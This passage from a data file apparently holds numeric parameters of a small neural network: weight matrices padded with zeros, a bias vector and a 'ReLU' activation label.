-0.10803, 0.3677, -1.316, 0.406, 0.01561, 0.227, -0.52, -0.5137, 0.4622, 0.0778, 0.07733], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.863, -0.04675, 0.2069, 0.4343, 0.576, 1.143, 0.05664, -0.6367, 0.0502, -0.3284, 0.0069, -0.3403, 0.2065, -0.1124, 0.4314, -0.0805, 0.0644, 0.8037, -0.1458, -0.5864, -0.006123, 0.876, 0.3552, -0.04337, -0.0426, -0.02982, 0.8047, -0.4297, 0.1448, -0.551, -0.2467, -0.3445, 0.01423, 0.093, -0.248, 0.02888, 0.7056, -0.004284, 1.879, -0.1309, -0.03424, 0.0676, 0.3352, 0.0653, 0.2238, 0.237, -0.1324, 0.1472, 0.06665, -0.0769], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1365, -0.03017, 0.2115, 0.4006, -0.1635, -0.10297, -0.01721, -0.1438, -0.1547, -0.2057, 
0.005627, -0.11005, -0.6704, -0.27, 0.2208, 0.087, -0.3896, -0.1348, 0.0678, -0.4387, 0.4167, -0.1938, 0.0465, 0.4163, -0.0324, 0.0418, 0.7256, 0.06165, -0.289, -0.1333, 0.002321, 1.002, -0.1748, 0.3337, -0.619, -0.2568, 0.179, -0.00362, 3.486, 0.172, 0.004395, -0.2178, 0.0994, 0.02422, 0.1727, 0.5645, 0.5913, -0.8213, -0.22, 0.1439], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3672, -0.01478, 0.2482, -1.608, 0.381, 1.103, -0.3123, 0.5093, 0.2148, -1.415, -0.0317, -1.081, 0.6577, 0.2435, 0.02805, 0.07855, 1.254, -0.2059, 0.00934, 0.1348, -0.6997, -0.3293, -0.611, -0.3752, 0.02428, 0.03223, 1.148, -0.4395, -0.2664, 0.4111, 0.1225, 1.741, -0.3843, 0.05585, 0.827, -0.2788, 0.4268, 0.01666, 1.575, 0.4385, -0.04202, 1.0625, 0.5654, 0.01569, -0.725, 0.468, 0.4556, 0.7183, -0.005306, -0.0925], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2578, -0.03314, 0.2761, 1.378, -0.825, -0.5986, 0.6685, -0.2056, 0.058, 0.306, -0.01502, 0.2328, 0.9033, 0.831, 1.004, 0.7856, 0.1891, 0.3154, 1.525, 0.8525, 0.7407, 1.609, 0.524, -0.0523, 0.0053, -0.01984, -0.9224, -0.532, 0.3828, 0.08875, 0.3284, 0.926, 0.345, -0.06305, 0.2578, -0.363, 0.75, -0.04068, 0.1355, -0.1407, 0.9795, -0.0624, 0.0922, -0.01337, -0.1282, -0.1804, 0.129, 2.605, -0.2993, -0.801], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.578, 0.02156, 0.1489, -0.1703, -0.3862, 0.03424, -0.2085, -1.468, 0.3984, 
0.1656, -0.03082, 0.1843, 0.0772, 0.1582, -0.3962, 1.247, -0.06696, 0.1626, 0.321, -0.1277, 0.316, 0.399, 0.3577, -0.564, 0.04034, 0.02518, 0.05777, 0.112, 0.1714, -0.08057, 0.2625, -1.811, -0.111, -0.341, -0.4795, 0.1216, 0.0885, -0.02336, 0.2812, 1.532, 0.2343, -0.28, 0.1613, 0.0354, 0.5737, -0.4211, -0.326, 0.257, -0.08527, -0.2104], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.3528, 0.03735, 0.45, 0.2756, -0.0898, -0.1868, -0.1191, -0.899, -0.2421, -0.2296, 0.0433, -0.261, 0.6104, 1.382, 0.2178, -0.282, 0.5493, 0.6113, 0.1106, 0.1675, 1.257, 0.3848, -0.663, 0.9644, 0.04218, 0.03714, -1.088, -0.4353, 0.969, -0.1525, -0.3447, 1.067, 0.422, 0.621, -0.3076, 0.7812, -0.5103, 0.03784, 0.1197, -0.1606, 0.3206, -0.111, 0.165, -0.04138, -0.4893, -0.00256, -0.1261, -0.32, -0.272, -0.3394], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.752, 0.008026, 0.1272, 0.7646, -0.65, 0.4277, -0.282, 0.2427, 0.05096, -0.374, 0.003086, 0.3271, 0.507, -0.124, -0.7812, 0.6045, -0.1483, -0.4233, 0.2188, -0.2095, 0.2195, 0.437, 0.3901, 0.3647, 0.03784, 0.04068, 0.3254, 0.1973, 0.1229, 0.2289, 0.3862, 0.346, -0.4607, 0.2095, -0.4546, -0.7676, -0.433, 0.02858, -1.87, -0.07434, -0.641, -0.2441, 0.55, 0.0388, 0.04782, 0.7773, -0.511, -0.164, 0.2319, 0.07733], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.406, -0.01718, -0.3486, -2.748, -1.249, 0.9146, -0.134, -0.0337, -0.02682, 
0.5625, 0.006195, -0.2445, -0.7847, 0.1476, -0.0553, -0.5576, -1.171, -0.3086, -0.316, 0.1545, 0.2288, 0.612, -0.05365, 0.01515, -0.02058, 0.01414, 0.2236, -0.6216, 0.613, 0.01157, -0.2046, -4.617, 0.389, 0.2054, -0.3357, -0.1467, -0.3562, -0.01645, 0.4558, -0.03455, 0.292, 1.443, 0.4365, 0.05374, 0.4458, -1.629, -0.3113, -0.107, 0.2117, 0.3308], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.148, -0.0281, -0.3164, -1.13, 0.8267, 0.382, 0.688, -0.1631, -0.0558, 0.1385, -0.03656, 0.0974, -1.445, 0.2249, -0.1, 0.1467, -0.2498, 1.767, -0.578, -0.0817, -1.268, -0.623, -0.03357, -0.04083, -0.006886, -0.03757, 0.8115, 0.0922, 0.1996, 0.02147, -0.596, -4.926, 0.1092, -0.4119, 0.5127, 0.4446, 0.2888, -0.0439, 0.9634, -0.1113, -0.041, -0.04282, 0.449, 0.02141, 0.1342, -0.04214, 0.7397, -0.626, -0.1892, 0.01099], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.47, -0.04138, 0.275, -0.006195, 2.38, 0.7153, -0.2725, -0.00431, 1.26, 0.03378, -0.01804, -0.6953, -1.252, 0.5005, 0.3877, 0.3323, -0.6167, 0.3975, 0.4712, -0.2174, 0.8027, -0.7197, 1.034, -0.1868, -0.04306, -0.02083, -0.609, 0.5376, 1.041, 0.1616, 0.97, -0.257, -0.5854, -0.3503, -0.8286, -0.1381, 0.1372, 0.007664, 0.3083, 0.001277, 0.2113, -0.3127, -0.0787, 0.06213, 0.2363, -0.3105, -0.772, 0.4893, -0.0775, 0.2169], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2773, 0.010895, -0.05765, -0.4265, -1.026, 
-0.4482, -0.1816, -0.1245, 0.011925, 0.1469, 0.02, 0.1072, 0.4802, -0.1223, -0.3525, 0.4263, -0.324, 0.0817, 0.08167, -0.02876, 0.3823, 0.911, 0.1054, 0.827, -0.02393, -0.03806, 0.2224, -0.4746, 0.012436, 0.10876, -0.1956, -0.4392, -0.2231, 0.454, -0.1261, -0.402, 0.5137, 0.03146, -2.082, 0.5254, -0.02193, -0.2098, 0.3408, 0.00945, -0.2524, -0.4038, -0.1312, 0.05234, -0.3901, 0.889], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.926, -0.012764, 0.331, -0.4568, 1.564, 0.9526, -0.1805, -2.426, -1.141, 0.5566, 0.02972, -0.5454, -3.031, -0.356, 0.1322, 0.09607, 0.3179, 1.313, 0.6685, -2.451, -0.6035, 1.202, 0.472, 0.738, -0.02481, 0.02548, -0.0571, -0.365, -0.414, -0.02122, -0.364, -1.15, 0.9946, 0.2673, 0.507, 0.422, 0.2001, -0.0454, -1.399, -0.2551, -0.9526, 0.363, 0.28, 0.06915, -0.1471, -0.663, 1.073, 1.05, 0.566, -0.3342], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.04703, 0.02603, -0.00239, -0.03568, -0.02388, 0.005646, -0.0106, -0.02118, -0.00674, 0.00683, -0.003952, -0.0108, 0.02226, 0.04584, 0.0105, 0.006634, 0.02028, 0.0324, 0.005165, -0.0433, -0.02408, -0.04214, 0.01651, -0.01993, 0.03162, -0.01802, -0.02008, 0.0007777, -0.02756, -0.04553, 0.01808, 0.001119, -0.01596, -0.03278, -0.04626, -0.0155, -0.013336, 0.03586, -0.001703, -0.01313, -0.02757, -0.04437, -0.007835, 0.036, -0.001357, -0.04413, 0.0099, 0.02455, -0.00276, -0.006874], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.149, 0.008, -0.02437, 0.483, 0.609, -0.3862, -0.0078, 0.7017, -0.01432, -0.2876, 0.05936, -0.3264, 0.04892, 0.4016, -0.1901, 0.1309, 0.5825, 0.727, -0.273, 0.3362, -1.028, -0.01932, 0.01372, 0.0554, 0.03143, -0.04376, -1.058, 0.2069, 0.1626, -0.0656, -0.10864, 1.377, 0.0751, 0.08875, -0.184, -0.3333, 0.2479, 0.02844, -0.39, 0.3142, -0.4778, -0.1415, -0.7686, 0.015396, -0.0362, 0.05, 0.0951, -1.174, 0.415, 0.732], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.6846, 0.02663, -0.02704, -0.4937, 0.08545, 0.1989, 1.145, 0.0208, 0.3176, -0.2205, -0.03482, -0.1149, 0.0336, 0.1625, 0.1633, -0.006622, -0.399, -0.396, -0.3774, -0.2327, 0.09436, 0.1912, 0.169, 0.02922, -0.03418, -0.03308, -0.02473, -0.955, 0.2656, 0.092, -0.0691, -0.1371, -0.0987, 0.3037, -0.2079, -0.2188, 0.1521, 0.03738, -5.273, 0.32, -0.01593, -0.419, -0.0451, 0.01979, 0.4487, -0.04437, 0.3372, -0.06476, -0.1864, 1.328]]
[-0.408486, 1.06875, -0.101351, 0.291739, 0.361906, -1.17598, -1.08494, -0.525396, -0.485121, -0.563451, -0.430958, -0.375102, -0.299369, -0.300263, -0.528058, -0.0620032, -0.65379, 0.730181, -0.849961, -0.0157298, -0.289808, 0.27894, 1.47078, 2.10793, -0.31017, -0.538444, -0.145919, 1.01049, -0.374156, -0.0527222, -0.14879, 0.255464, -0.772198, -1.76047, 0.0622966, 0.254439, -0.150744, -0.757264, -2.46425, -0.913194, -0.563058, -0.217101, 0.570546, -0.523408, -1.49997, -0.261921, -0.526109, -0.00598984, -0.464336, 0.114195, -0.4084, 1.068, -0.1014, 0.2917, 0.3618, -1.176, -1.085, -0.5254, -0.485, -0.5635, -0.431, -0.375, -0.2993, -0.3003, -0.528, -0.062, -0.654, 0.73, -0.85, -0.01573, -0.2898, 0.279, 1.471, 2.107, -0.31, -0.5386, -0.1459, 1.011, -0.3743, -0.05273, -0.1488, 0.2554, -0.772, -1.761, 0.0623, 0.2544, -0.1508, -0.7573, -2.465, -0.913, -0.563, -0.217, 0.5703, -0.5234, -1.5, -0.262, -0.526, -0.00599, -0.4644, 0.1142]
ReLU
[[-0.775044, -0.415395, -0.324942, 0.112048, -0.74317, -0.784722, -0.778083, -0.357055, -0.357092, -0.225596, 0.89654, -0.552908, -0.136944, -0.232227, -0.498618, 0.433755, 1.43314, -0.740146, -1.05938, -0.0229214, 0.335653, -0.593277, -0.374214, -2.31097, 0.292584, 1.00206, 0.150349, -1.89577, -0.138339, -0.487172, -0.685847, -2.05561, 0.518935, 0.305489, 0.171208, 0.0961368, 0.797444, -1.2447, -0.736054, 0.805096, -0.174525, -0.109511, -0.208033, -1.6955, -1.00053, -0.212945, -0.880842, 0.00288769, -0.0587614, 0.393332, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.289933, -0.0390589, -0.235392, -0.0341524, -0.101442, -0.0104391, -0.153227, 0.14617, 0.0203408, 0.0205047, -0.204445, 0.229674, -0.0964483, 0.0687688, 0.00506923, -0.189823, 0.259219, -0.271825, 0.01345, -0.0236374, -0.00100425, 0.070848, -0.0760077, -0.158165, 0.0834323, -0.00705742, -0.0295734, -0.0918318, -0.00783515, 0.0157236, -0.368545, 0.259276, 0.51233, 0.0470324, 0.0245031, 0.0139921, -0.249023, -0.141486, 0.0633367, 0.164842, -0.158553, 0.154392, -0.145494, -0.185129, -0.0243234, 0.546112, -0.0510707, 0.0289771, 0.0943521, 0.244394, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.099163, -0.0366602, 0.0755007, 0.446032, -0.179006, -0.0030297, 0.133774, -0.111621, 0.382412, 0.41951, -0.164855, -0.111633, 0.0140495, -0.163988, -0.273372, -0.0503863, -0.159384, -0.128305, -0.127405, 0.0283343, -0.0852565, -0.339762, -0.0101792, -0.0474959, -0.295914, -0.0423524, 0.0283382, -0.170574, -0.199672, -0.078606, -0.0304747, 0.141624, 0.115279, 0.0424489, -0.0896282, 0.00771229, -0.0468138, 
-0.293026, 0.0592837, 0.169743, -0.0259172, -0.134006, -0.0115559, 0.0412064, 0.0757857, -0.177031, -0.0125494, -0.0174408, 0.135628, 0.0385604, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.605937, -0.285093, 1.46327, -0.355091, 0.362924, 0.227066, -0.767363, -2.10343, -0.395873, 1.31398, -1.75569, 1.21543, 0.304692, 0.0679581, -0.433435, 1.42359, -0.496077, 0.176303, 0.137501, 0.00302901, -0.743782, -0.275058, 0.160956, 0.450417, 0.943343, 0.208146, -0.413542, 1.15751, -0.135771, -0.248231, 0.260131, -1.36444, -1.37311, 0.528376, 0.148232, 0.162377, 0.170921, -0.189102, -0.0934121, -0.0273202, 0.347112, 0.296986, 0.434758, 1.45867, 0.608835, -1.53797, 0.0230557, 0.040957, 0.03261, 0.362523, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.670455, 0.710898, 1.28744, -0.882045, 0.0258417, 0.903023, -0.5382, -0.174708, 0.208279, -0.29329, 0.518818, -0.622398, 0.409716, 1.54737, 1.27005, 0.16951, -1.90741, -1.46998, 0.0279246, 0.0450144, 0.355137, -0.0628051, -0.683266, 0.309326, -0.600533, -1.01948, 0.679086, -2.22737, 0.518847, 0.0882435, -0.920202, -2.5876, 1.18247, -0.226148, 0.361083, -1.85547, 0.691654, 0.365051, -0.537776, 0.160241, 0.0905421, -0.69779, 0.962715, 0.866893, 1.89278, -1.29419, 0.939011, -0.0133065, 0.755068, -0.0372955, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.121062, -0.112551, -0.331936, 0.0576856, -0.0952833, 0.0641034, 
-0.0380395, 0.069137, 0.0394384, 0.0432422, 0.177619, -0.323053, -0.0772591, 0.0112817, -0.0407238, 0.078279, 0.31725, -0.0402553, -0.132371, 0.0485819, 0.0520028, -0.089381, -0.121834, -0.220348, 0.172532, 0.0210572, -0.105575, -0.129419, 0.0310569, -0.0714138, 0.160757, 0.18827, 0.397979, 0.025908, -0.185127, 0.240188, 0.0424864, -0.166795, 0.0879923, 0.321831, -0.00452026, -0.0663753, -0.0543892, 0.0373707, 0.180538, 0.373327, -0.0775681, 0.0230342, -0.0941502, 0.207511, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.248874, 0.0982728, 0.0846956, 0.486966, 0.0546425, 0.213559, 0.0120736, 0.449745, -0.28653, -0.457988, -0.187885, -0.226453, 0.18666, 0.117949, -0.0120727, 0.25654, -0.173109, -0.134126, -0.0560314, -0.0045311, -0.192302, -0.0884756, 0.0402012, 0.0398664, 0.737175, -0.172223, -0.0684839, -0.00075194, 0.0852525, 0.212977, 0.370546, -0.365634, 0.322437, 0.188932, 0.159048, -0.106006, -0.0446813, -0.24157, 0.0156972, 0.0392898, 0.0576905, -0.0127836, -0.235329, -0.317162, -0.21647, -0.305702, 0.0441344, 0.0336897, -0.0722653, 0.124496, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.393225, -0.205191, -0.35831, -0.18181, -0.208585, -0.265514, 0.338443, 0.387592, 0.803458, 0.0297769, 0.244932, -0.212447, -0.330273, -0.194288, 0.685385, -0.212339, 0.0726721, -0.052438, 0.0899994, -0.0200148, 0.181243, 0.936649, 0.0974104, -0.263275, -0.0655607, -0.256915, -0.0618897, -0.0968321, 0.303331, 0.0429135, -0.109106, 0.480513, 0.55293, 0.137135, 0.482449, -0.032718, 0.153575, -0.0165924, -0.223499, 0.709982, 0.0422823, -0.110095, -0.114181, 0.11054, 
-0.375481, 0.142812, -0.160258, -0.0212633, 0.134853, -0.406273, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0818828, -0.177643, -0.291979, 0.358953, -0.0206239, -0.154736, -0.0578907, 0.0736091, -0.116992, -0.371863, -0.272881, -0.361285, 0.108221, 0.18245, 0.252614, -0.233528, 0.357438, 0.19119, -0.149432, -0.0238803, 0.0650345, 0.419219, -0.0935929, -0.120685, 1.11962, 0.370422, -0.182359, 0.65889, 0.0998101, -0.143984, 0.268125, -0.289762, 0.531907, -0.148363, 0.177573, -0.130263, 0.0291982, -0.376395, -0.221834, -0.0800251, -0.495121, -0.0537386, -0.305319, 0.625073, -0.0209418, 0.150732, -0.156614, 0.0211654, -0.358304, 0.050066, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.194819, 0.372706, -0.136073, 0.115637, -0.564466, 0.457853, 0.2284, 0.615822, 0.420017, -0.400167, 2.25497, 0.387347, -1.02186, -0.0317851, -1.05273, 0.23534, -0.199973, 0.453475, 0.114129, -0.0307462, -0.0712554, 0.654712, 0.0197267, -1.11745, 0.278202, -0.0715725, 0.130393, 0.417971, -0.496835, -0.587662, 0.0472645, -0.234516, -0.0925567, -0.580341, 0.218873, 0.244211, 0.816749, -0.604895, -0.594381, -0.504349, -1.77115, -0.760193, 0.145655, -0.341681, -0.292623, 0.388744, 0.676587, 0.0216446, -0.0209792, -0.0632221, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.657673, -0.236014, -0.478229, -0.0304675, -0.373831, 0.197733, 0.00821276, 0.471799, 0.700843, 0.130614, 
-1.41459, 0.0918417, -0.103947, 0.0448295, -0.142033, 0.404678, 0.522869, 0.662575, -0.356512, 0.0464266, 0.195922, 0.684416, -0.203029, -0.222214, 1.34309, -0.41915, -0.105085, -0.507511, 0.0591906, -0.0714123, -0.137054, 0.534257, 0.16111, -0.36477, -0.215097, 0.585106, -0.016371, -0.138725, 0.482136, -0.0488709, -0.617627, 0.162392, -0.186088, -0.121071, 0.982127, 0.279216, -0.0342331, -0.0428749, 0.373818, -0.410173, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.510451, 0.0903219, 0.373484, 0.194804, -0.138909, 0.182357, 0.133604, -0.579168, 0.287305, -0.12749, 